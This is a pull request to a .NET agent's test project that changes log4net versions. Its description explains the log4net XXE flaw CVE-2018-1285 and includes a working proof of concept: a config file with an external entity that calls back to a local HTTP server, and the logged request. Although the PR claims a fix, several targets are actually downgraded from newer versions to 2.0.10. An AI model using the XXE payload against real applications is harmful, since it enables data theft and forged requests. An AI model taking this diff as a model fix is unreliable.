### PR TITLE
Update and Fixed XML External Entity attack in log4net

### DIFF
--- a/tests/Agent/IntegrationTests/SharedApplications/Common/MultiFunctionApplicationHelpers/MultiFunctionApplicationHelpers.csproj
+++ b/tests/Agent/IntegrationTests/SharedApplications/Common/MultiFunctionApplicationHelpers/MultiFunctionApplicationHelpers.csproj
@@ -1,4 +1,4 @@
-﻿<Project Sdk="Microsoft.NET.Sdk">
+<Project Sdk="Microsoft.NET.Sdk">
 
   <PropertyGroup>
     <TargetFrameworks>netcoreapp3.1;net5.0;net6.0;net7.0;net462;net471;net48;net481</TargetFrameworks>
@@ -16,22 +16,22 @@
     <PackageReference Include="LibGit2Sharp.NativeBinaries" Version="1.0.205" />
     
     <!-- log4net .NET framework references -->
-    <PackageReference Include="log4net" Version="1.2.10" Condition="'$(TargetFramework)' == 'net462'" />
-    <PackageReference Include="log4net" Version="2.0.5" Condition="'$(TargetFramework)' == 'net471'" />
+    <PackageReference Include="log4net" Version="2.0.10" Condition="'$(TargetFramework)' == 'net462'" />
+    <PackageReference Include="log4net" Version="2.0.10" Condition="'$(TargetFramework)' == 'net471'" />
     <PackageReference Include="log4net.Ext.Json" Version="1.2.15.14586" Condition="'$(TargetFramework)' == 'net471'" />
-    <PackageReference Include="log4net" Version="2.0.14" Condition="'$(TargetFramework)' == 'net48'" />
+    <PackageReference Include="log4net" Version="2.0.10" Condition="'$(TargetFramework)' == 'net48'" />
     <PackageReference Include="log4net.Ext.Json" Version="2.0.10.1" Condition="'$(TargetFramework)' == 'net48'" />
-    <PackageReference Include="log4net" Version="2.0.15" Condition="'$(TargetFramework)' == 'net481'" />
+    <PackageReference Include="log4net" Version="2.0.10" Condition="'$(TargetFramework)' == 'net481'" />
     <PackageReference Include="log4net.Ext.Json" Version="2.0.10.1" Condition="'$(TargetFramework)' == 'net481'" />
 
     <!-- log4net .NET core references -->
     <PackageReference Include="log4net" Version="2.0.10" Condition="'$(TargetFramework)' == 'netcoreapp3.1'" />
     <PackageReference Include="log4net.Ext.Json" Version="2.0.9.1" Condition="'$(TargetFramework)' == 'netcoreapp3.1'" />
-    <PackageReference Include="log4net" Version="2.0.12" Condition="'$(TargetFramework)' == 'net5.0'" />
+    <PackageReference Include="log4net" Version="2.0.10" Condition="'$(TargetFramework)' == 'net5.0'" />
     <PackageReference Include="log4net.Ext.Json" Version="2.0.10.1" Condition="'$(TargetFramework)' == 'net5.0'" />
-    <PackageReference Include="log4net" Version="2.0.13" Condition="'$(TargetFramework)' == 'net6.0'" />
+    <PackageReference Include="log4net" Version="2.0.10" Condition="'$(TargetFramework)' == 'net6.0'" />
     <PackageReference Include="log4net.Ext.Json" Version="2.0.10.1" Condition="'$(TargetFramework)' == 'net6.0'" />
-    <PackageReference Include="log4net" Version="2.0.14" Condition="'$(TargetFramework)' == 'net7.0'" />
+    <PackageReference Include="log4net" Version="2.0.10" Condition="'$(TargetFramework)' == 'net7.0'" />
     <PackageReference Include="log4net.Ext.Json" Version="2.0.10.1" Condition="'$(TargetFramework)' == 'net7.0'" />
 
     <!--System.Data.SqlClient (.NET Core/5+ only) -->


### PR DESCRIPTION
Thank you for submitting a pull request.  Please review our [contributing guidelines](/CONTRIBUTING.md) and [code of conduct](https://opensource.newrelic.com/code-of-conduct/).

## Description

Apache log4net before 2.0.10 does not disable XML external entities when parsing log4net configuration files. This could allow for XXE-based attacks in applications that accept arbitrary configuration files from users.

**PoCs:**
```js
// Program.cs - the application
using System.IO;
using System.Reflection;
using log4net;
using log4net.Config;

namespace CVE_2018_1285
{
    class Program
    {
        private static readonly ILog log = LogManager.GetLogger(typeof(Program));
        static void Main(string[] args)
        {
            var logRepository = LogManager.GetRepository(Assembly.GetEntryAssembly());
            XmlConfigurator.Configure(logRepository, new FileInfo("log4net.config"));
            log.Info("Info");

        }
    }
}

// log4net.config content:
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "http://localhost:8000/">
]>
<foo>&xxe;</foo>

// for simple python server, on cmd:
> python -m http.server

// When running the built application, the following request is logged at the server side:
::1 - - [19/Dec/2022 10:18:48] "GET / HTTP/1.1" 200
```

# Author Checklist
- [x] Unit tests, Integration tests, and Unbounded tests completed
- [x] Performance testing completed with satisfactory results (if required)
- [x] [Agent Changelog](/src/Agent/CHANGELOG.md) or [Lambda Agent changelog](/src/AwsLambda/CHANGELOG.md) updated 

# Reviewer Checklist
- [x] Perform code review
- [x] Pull request was adequately tested (new/existing tests, performance tests)
- [x] Review Changelog
